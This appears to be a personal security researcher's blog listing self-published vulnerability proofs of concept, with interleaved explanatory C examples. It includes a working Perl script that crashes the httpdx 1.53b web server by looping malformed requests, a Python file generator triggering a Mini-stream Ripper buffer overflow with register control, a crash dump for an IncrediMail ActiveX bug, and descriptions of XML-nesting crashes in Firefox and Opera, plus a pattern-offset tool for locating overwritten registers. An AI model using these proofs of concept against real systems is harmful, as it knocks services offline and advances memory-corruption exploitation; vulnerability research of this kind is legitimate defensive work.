After a long time.

Hey guys, it’s been a long, long time. Some of my blog readers might wonder where I was all these days. Well, I was away from the blogosphere for my degree final-year exams.
After completing a degree in computer science and commerce applications at Osmania University, I decided to make my career as a network professional. Though I have completed many courses like CCNA, CCNP, MCSE, MCITP and MCDBA, I don’t have any certificates from those vendors. To make a career in the competitive field of networking, I think it’s good to get some certificates which help validate and prove my experience and knowledge in using different products and solutions. After discussing with some experienced friends in the field of networking, I started with the Microsoft MCITP Windows Server 2008 Administrator exam.
Last week I successfully completed all the necessary exams for the MCITP Windows Server 2008 Administrator certificate, and now I am a Microsoft Certified IT Professional (MCITP) Enterprise Administrator.
And now I am looking forward to doing the CCNA exam soon.

/schaba

IncrediMail 2.0 ImSpoolU.dll ActiveX Bug

While fuzzing the IncrediMail ActiveX control I ran into this ActiveX bug. I don’t have much clue how to exploit it. I know this is really lame, but if anyone else can give me more information about this, let me know. Link to exploit db

Debugging info
————–
Exception Code: ACCESS_VIOLATION
Disasm: 678914AE MOV EDX,[ECX] (ImSpoolU.dll)

Seh Chain:
————————————————–
1 678AE129 ImSpoolU.dll
2 678AE3C0 ImSpoolU.dll
3 678AE6D0 ImSpoolU.dll
4 1682950 VBSCRIPT.dll
5 7C839AD8 KERNEL32.dll

Called From Returns To
————————————————–
ImSpoolU.678914AE 8458BEC

Registers:
————————————————–
EIP 678914AE -> Asc: AUTH
EAX 018BDA90 -> Asc: AUTH
EBX 01C00048 -> 678B83EC
ECX 00000000
EDX 0018A812 -> F00DBAAD
EDI 00000006
ESI 018BDA90 -> Asc: AUTH
EBP 77124C1B -> 8B55FF8B
ESP 0013ED24 -> BFA7C790

Block Disassembly:
————————————————–
6789149C CALL 678A14A0
678914A1 MOV [ESI+4],EAX
678914A4 MOV ESI,[ESI+4]
678914A7 JMP SHORT 678914AB
678914A9 XOR ESI,ESI
678914AB MOV ECX,[EBX+18]
678914AE MOV EDX,[ECX] <--- CRASH
678914B0 MOV EAX,[EDX+18]
678914B3 PUSH 0
678914B5 PUSH EDI
678914B6 PUSH ESI
678914B7 CALL EAX
678914B9 MOV ESI,EAX
678914BB CMP ESI,-1
678914BE JNZ SHORT 678914D2

ArgDump:
--------------------------------------------------
EBP+8 0574C085
EBP+12 D1FC408B
EBP+16 04C25DE8
EBP+20 90909000
EBP+24 FF8B9090
EBP+28 53EC8B55

Stack Dump:
--------------------------------------------------
13ED24 90 C7 A7 BF B8 DA 8B 01 48 00 C0 01 48 00 C0 01 [........H...H...]
13ED34 00 00 00 00 C9 0B 04 80 00 00 00 00 80 ED 13 00 [................]
13ED44 29 E1 8A 67 FF FF FF FF 3A 28 89 67 48 00 C0 01 [...g.......gH...]
13ED54 78 ED 13 00 A4 A6 8B 67 C8 0B 04 80 01 00 00 00 [.......g........]
13ED64 D0 C7 A7 BF 70 50 C0 01 FF FF FF FF 48 00 C0 01 [....pP......H...]
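Reading the block disassembly above: ECX is loaded from [EBX+18] and is 0 at the crash, so the fault is a NULL read of an object pointer, not a write and not a controlled value. The two instructions after the fault load a function pointer from offset 0x18 of the table that object points to and CALL it with ESI, EDI and 0 as arguments, then compare the result with -1. The C below is an added example, not code from IncrediMail or from the original post: it reproduces that call shape (an object with a table of function pointers, slot 6 being byte offset 0x18 on 32-bit) next to the check that would have turned the crash into an error return. The struct layout, the names and the sample method are assumptions made for illustration; the dump does not say what ImSpoolU's real objects look like.

```c
#include <stddef.h>
#include <stdio.h>

/* Slot 6 of a 32-bit pointer table is byte offset 0x18: MOV EAX,[EDX+18]. */
enum { SLOT_IDX = 6, NSLOTS = 8 };

/* CALL EAX with PUSH 0 / PUSH EDI / PUSH ESI: method(esi, edi, 0). Return value
   is compared with -1 right after the call, so -1 is treated as the error code. */
typedef int (*slot_fn)(const void *buf, int len, int flags);

struct vtbl  { slot_fn slot[NSLOTS]; };
struct obj   { const struct vtbl *vt; };            /* MOV EDX,[ECX] reads this field   */
struct owner { void *pad[6]; struct obj *target; }; /* target sits at 0x18 on 32-bit    */

/* Mirrors the crashing block exactly: owner->target is dereferenced unconditionally.
   With target == NULL this faults at the equivalent of 678914AE. (assumed layout) */
int dispatch_unchecked(struct owner *o, const void *buf, int len) {
    struct obj *p = o->target;              /* MOV ECX,[EBX+18]                 */
    const struct vtbl *vt = p->vt;          /* MOV EDX,[ECX]   <- NULL read here */
    slot_fn fn = vt->slot[SLOT_IDX];        /* MOV EAX,[EDX+18]                 */
    return fn(buf, len, 0);                 /* CALL EAX                         */
}

/* The check the block is missing: refuse to dispatch through a missing object,
   table or slot, and report it the way the caller already expects (-1). */
int dispatch_checked(struct owner *o, const void *buf, int len) {
    if (o == NULL || o->target == NULL || o->target->vt == NULL)
        return -1;
    slot_fn fn = o->target->vt->slot[SLOT_IDX];
    if (fn == NULL)
        return -1;
    return fn(buf, len, 0);
}

/* Constructed stand-in for whatever slot 6 really is: returns the length it was given. */
int sample_method(const void *buf, int len, int flags) {
    (void)buf; (void)flags;
    return len;
}

int main(void) {
    struct vtbl vt = {{0}};
    vt.slot[SLOT_IDX] = sample_method;
    struct obj  ob = { &vt };
    struct owner with_obj = { {0}, &ob };
    struct owner no_obj   = { {0}, NULL };   /* the state in the dump: [EBX+18] == 0 */
    char buf[] = "AUTH";                     /* ESI in the dump points at "AUTH", EDI is 6 */

    printf("checked, object present: %d\n", dispatch_checked(&with_obj, buf, 4));
    printf("checked, object missing: %d\n", dispatch_checked(&no_obj, buf, 4));
    /* dispatch_unchecked(&no_obj, buf, 4) would fault here like ImSpoolU.dll did. */
    return 0;
}
```

If an attacker could place a non-zero value at [EBX+18], the same three instructions would read a function pointer from memory of their choosing and call it; with a NULL there, as in this dump, the path ends at the access violation.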

httpdx 1.53b (sockets++ crash) DoS exploit

Saw this PoC for httpdx on exploit-db, thought I’d fuzz that program, and found a DoS vulnerability in it.
The vulnerability is caused by an error in multi-socket handling. This can be exploited to crash the HTTP service.
Proof of concept in action:
$ ./htppd.pl 192.168.2.1 80
[+] Author : d3b4g
[+] Soft : httpdx1.53b Remote DoS
[+] Sending request…
[-]Done!


Exploit code:

#!/usr/bin/perl
# httpdx 1.53b remote DoS PoC: opens connection after connection to the
# HTTP service and sends a malformed request line on each one.
use strict;
use warnings;
use IO::Socket;

print "[+] Author : d3b4g\n";
print "[+] Soft   : httpdx1.53b Remote DoS\n";

if (@ARGV < 2) {
    print "[-] Usage:   file.pl <ip> <port>\n";
    print "[-] Example: file.pl 192.168.2.1 80\n";
    exit;
}

my ($ip, $port) = @ARGV;

print "[+] Sending request...\n";

# The original loop header was for($i=0;$i=4;$i++): "$i=4" is an assignment,
# so the condition is always true and the loop only ends when a connect()
# fails, which is when die() prints "[-]Done!" (as in the run shown above).
# Reassigning $socket closes the previous connection before the next one opens.
my $socket;
while (1) {
    $socket = IO::Socket::INET->new(
        Proto    => "tcp",
        PeerAddr => $ip,
        PeerPort => $port,
    ) || die "[-]Done!\n";

    # Malformed request line: a control byte (0x11) where the request target belongs.
    print $socket "GET \x11 HTTP/1.0\n\r\n";
}

Just some updates..

I published 3 vulnerabilities in the past few days and couldn’t get time to update, so here it is.

Firefox 3.6 (XML parser) Memory Corruption PoC
Mozilla Firefox 3.6 and earlier 3.0.x versions allows remote attackers to cause a denial of service (memory corruption) via an XML document composed of a long series of start-tags with no corresponding end-tags.

proof of concept exploit-db

Opera 10.10 (XML parser) Denial of Service

After opening opera.html the browser hangs for a while and crashes. Same bug in Firefox too :D
This vulnerability causes a denial of service (memory corruption) via an XML document composed of a long series of start-tags with no corresponding end-tags.

proof of concept exploit-db
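Both the Firefox and the Opera entries describe the same input shape: start-tags nested ever deeper with no end-tags, until the parser runs out of whatever it was spending per level. The page does not say which structure in either browser is corrupted, so the block below is not a model of their parsers. It is an added example (not from the original post, Mozilla or Opera) of the check such a parser needs: a hard cap on element nesting depth, tested before each new level is pushed, run over an input constructed here in the shape the two advisories describe. The scanner deliberately handles only element structure (no attributes, entities or namespaces); the tag name "x", the cap of 1024 and the function names are assumptions.

```c
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

enum {
    XML_OK             =  0,   /* every start-tag closed, depth stayed within the cap */
    XML_UNCLOSED       =  1,   /* start-tags still open at end of input              */
    XML_DEPTH_EXCEEDED = -1,   /* nesting went past max_depth: stop, do not allocate  */
    XML_MALFORMED      = -2    /* end-tag at depth 0, empty tag or unterminated '<'   */
};

/* Scan the element structure of doc[0..len). Each start-tag pushes one level,
   each end-tag pops one; <x/>, <?...?> and <!...> leave the depth unchanged.
   The depth cap is checked before a level is pushed, so a document of the
   advisories' shape is rejected after max_depth tags rather than at the end. */
int xml_depth_scan(const char *doc, size_t len, size_t max_depth) {
    size_t depth = 0, i = 0;
    while (i < len) {
        if (doc[i] != '<') { i++; continue; }
        const char *gt = memchr(doc + i, '>', len - i);
        if (gt == NULL) return XML_MALFORMED;          /* '<' without a closing '>' */
        size_t j = (size_t)(gt - doc);                  /* index of '>'              */
        if (j == i + 1) return XML_MALFORMED;           /* "<>"                      */
        char first = doc[i + 1];
        if (first == '/') {                             /* end-tag                   */
            if (depth == 0) return XML_MALFORMED;
            depth--;
        } else if (first == '?' || first == '!') {      /* PI, comment, doctype      */
            /* no depth change */
        } else if (doc[j - 1] == '/') {                 /* self-closing <x/>         */
            /* no depth change */
        } else {                                        /* start-tag                 */
            if (depth >= max_depth) return XML_DEPTH_EXCEEDED;
            depth++;
        }
        i = j + 1;
    }
    return depth == 0 ? XML_OK : XML_UNCLOSED;
}

/* Constructed input in the shape the advisories describe: n start-tags <tag>
   back to back and not a single end-tag. Caller frees the result. */
char *make_unclosed_doc(const char *tag, size_t n) {
    size_t tl = strlen(tag);
    char *doc = malloc(n * (tl + 2) + 1);
    if (doc == NULL) return NULL;
    char *p = doc;
    for (size_t k = 0; k < n; k++) {
        *p++ = '<';
        memcpy(p, tag, tl);
        p += tl;
        *p++ = '>';
    }
    *p = '\0';
    return doc;
}

int main(void) {
    const char *good = "<a><b/><c></c></a>";
    printf("well-formed     : %d\n", xml_depth_scan(good, strlen(good), 1024));

    char *doc = make_unclosed_doc("x", 100000);          /* 100000 nested <x> */
    if (doc == NULL) return 1;
    printf("100000 open tags: %d (cap 1024)\n", xml_depth_scan(doc, strlen(doc), 1024));
    free(doc);
    return 0;
}
```

Rejecting on the way down is the point: a parser that only notices the missing end-tags at end of input has already paid for every level, which is exactly the resource the malicious document is spending.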

Mini-stream Ripper 3.0.1.1 (.smi) Local Buffer Overflow PoC

#!/usr/bin/python
# Mini-stream Ripper 3.0.1.1 (.smi) local buffer overflow PoC
# Tested on: win XPsp3
# webpage: d3b4g.info
#
# Register state at the crash, as shown by the debugger:
# EAX 00E1C880
# EDX 00000001
# EBX 41414141 ---------- control over registers (filled from the file)
# ESP 000D198C
# EBP 00E1C880
# ESI 41414141 ---------- control over registers (filled from the file)
# EDI 00E1C880
# EIP 00431302 Ripper.00431302
# C 0  ES 0023 32bit 0(FFFFFFFF)
# P 0  CS 001B 32bit 0(FFFFFFFF)
# A 0  SS 0023 32bit 0(FFFFFFFF)
# Z 0  DS 0023 32bit 0(FFFFFFFF)

chars = "A" * 90000            # filler on both sides of the marker
crush = "\x41\x41\x41\x41"     # "AAAA", the value seen in EBX and ESI

# Write the 180004-byte .smi file; opening it in Ripper triggers the crash.
with open('exp.smi', 'w') as f:
    f.write(chars + crush + chars)

proof of concept exploit-db
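The PoC above fills the file with "A"s, which proves that EBX and ESI are loaded from the file but not from which offset, since every 4-byte window looks the same. The usual next step is to replace the filler with a pattern in which every 4-byte window is unique and then look up the register value. The block below is an added example, not code from the original post or from Mini-stream Ripper: it generates a de Bruijn sequence over a..z (the same construction pwntools' cyclic() and cyclic_find() use, so every window in the first 26^4 = 456976 bytes is unique), writes a file of the PoC's 180004-byte size, and maps a little-endian register value back to its file offset. The output filename and the sample register value are assumptions; the page does not say what offset the real crash corresponds to.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define CYC_K 26                                   /* alphabet 'a'..'z'           */
#define CYC_N 4                                    /* unique 4-byte windows       */
#define CYC_MAX (26UL * 26UL * 26UL * 26UL)        /* sequence length, 456976     */

struct cyc_gen { uint8_t *out; size_t len, pos; int a[CYC_N + 1]; };

/* Standard recursive de Bruijn generator (same algorithm as pwntools). Emission
   is pruned once the requested number of bytes has been produced. */
static void cyc_db(struct cyc_gen *g, int t, int p) {
    if (g->pos >= g->len) return;
    if (t > CYC_N) {
        if (CYC_N % p == 0)
            for (int i = 1; i <= p && g->pos < g->len; i++)
                g->out[g->pos++] = (uint8_t)('a' + g->a[i]);
        return;
    }
    g->a[t] = g->a[t - p];
    cyc_db(g, t + 1, p);
    for (int j = g->a[t - p] + 1; j < CYC_K; j++) {
        g->a[t] = j;
        cyc_db(g, t + 1, t);
    }
}

/* Fill out[0..len) with the pattern "aaaabaaac...". Returns bytes written
   (len, capped at CYC_MAX, beyond which windows would repeat). */
size_t cyclic_create(uint8_t *out, size_t len) {
    struct cyc_gen g;
    memset(&g, 0, sizeof g);
    g.out = out;
    g.len = len < CYC_MAX ? len : CYC_MAX;
    cyc_db(&g, 1, 1);
    return g.pos;
}

/* The dword at byte offset off of the pattern, little-endian: what the debugger
   shows in a register loaded from that position (EBX/ESI in the PoC dump). */
uint32_t cyclic_word_at(size_t off) {
    uint8_t w[4] = {0, 0, 0, 0};
    uint8_t *buf = malloc(off + 4);
    if (buf == NULL) return 0;
    if (cyclic_create(buf, off + 4) >= off + 4) memcpy(w, buf + off, 4);
    free(buf);
    return (uint32_t)w[0] | (uint32_t)w[1] << 8 | (uint32_t)w[2] << 16 | (uint32_t)w[3] << 24;
}

/* Offset within a len-byte pattern whose bytes produced register value reg
   (little-endian, as displayed), or -1 if reg did not come from the pattern. */
long cyclic_find(uint32_t reg, size_t len) {
    uint8_t needle[4];
    for (int i = 0; i < 4; i++) needle[i] = (uint8_t)(reg >> (8 * i));
    uint8_t *buf = malloc(len ? len : 1);
    if (buf == NULL) return -1;
    size_t n = cyclic_create(buf, len);
    long off = -1;
    for (size_t i = 0; i + 4 <= n; i++)
        if (memcmp(buf + i, needle, 4) == 0) { off = (long)i; break; }
    free(buf);
    return off;
}

int main(void) {
    const size_t len = 90000 + 4 + 90000;           /* same size as the PoC's exp.smi */
    uint8_t *buf = malloc(len);
    if (buf == NULL) return 1;
    cyclic_create(buf, len);
    FILE *f = fopen("exp_cyclic.smi", "wb");         /* assumed output name */
    if (f) { fwrite(buf, 1, len, f); fclose(f); }
    free(buf);
    /* Suppose the debugger now showed EBX = 62616161 ("aaab" in memory). */
    printf("EBX=62616161 -> offset %ld\n", cyclic_find(0x62616161u, len));
    return 0;
}
```

Open the generated .smi in Ripper instead of the all-"A" one, read EBX and ESI from the crash dump, and feed each value to cyclic_find() to learn which bytes of the file they came from.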

I found an interesting bug in IE8 while testing my sexy fuzzer which I’m developing; I will update it later after digging into it.
That’s all, folks!